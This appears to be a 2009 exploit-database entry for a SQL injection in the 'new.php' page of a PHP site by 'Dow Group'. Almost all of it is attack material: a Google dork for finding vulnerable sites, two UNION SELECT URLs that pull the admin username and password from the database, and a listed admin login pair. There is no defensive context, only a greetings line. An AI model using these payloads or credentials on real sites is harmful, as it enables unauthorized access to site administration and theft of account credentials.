[] NeoSense

Dow Group - 'new.php' SQL Injection

Author: ProF.Code
type: webapps
platform: php
port: 
date_added: 2009-11-15 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

=====================================
| Dow Group admin by pass (new.php)
=====================================
Author:ProF.Code
Email :adt@hotmail.com
=====================================
~~~~~~~~~~~~~~~~~~~~
dork(google) : intext:"powered and designed by Dow Group"
~~~~~~~~~~~~~~~~~~~~
demo (username): http://server/new.php?id=-9+union+select+1,user_name,3,4+from+admin
demo (password) : http://server/new.php?id=-9+union+select+1,password,3,4+from+admin
user : nabadmin
pass : nabadmin_123
=============================================================

#====GreeTZ===============#
#all my friends in my email #
#======================#